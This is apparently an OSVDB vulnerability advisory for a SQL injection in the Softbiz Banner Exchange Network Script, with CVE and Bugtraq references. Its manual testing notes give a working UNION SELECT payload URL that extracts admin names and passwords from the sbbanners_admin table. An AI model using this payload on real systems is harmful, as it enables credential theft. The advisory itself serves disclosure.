Softbiz Banner Exchange Network Script campaign_stats.php id Variable SQL Injection

2007-11-11T00:00:00
ID OSVDB:39731
Type osvdb
Reporter OSVDB
Modified 2007-11-11T00:00:00

Description

Manual Testing Notes

http://[target]/campaign_stats.php?id=999999%20union//select//0,1,2,3,4,5,6,7,8,admin_name,10,pwd,12,13,14,15//from//sbbanners_admin/*

References:

Vendor URL: http://www.softbizscripts.com/banner-exchange-script-features.php
ISS X-Force ID: 38401
Generic Exploit URL: http://www.milw0rm.com/exploits/4619
CVE-2007-5997
Bugtraq ID: 26401